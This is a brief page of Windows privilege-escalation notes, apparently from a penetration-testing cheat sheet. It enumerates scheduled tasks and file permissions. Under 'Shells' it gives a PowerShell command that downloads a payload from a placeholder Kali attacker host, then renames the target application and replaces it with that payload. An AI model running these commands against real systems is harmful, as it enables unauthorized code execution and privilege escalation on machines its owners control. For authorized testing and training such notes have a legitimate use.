schtasks /query /fo LIST /v
icacls "<Application Full Path>"
Shells
iwr -Uri http://<Kali IP Address>/<Payload File Name> -Outfile <Application File Name>
move <Application File Full Path> ./<Application File Name>.bak
move <Application File Name> <Application File Full Path>
Last updated 23 days ago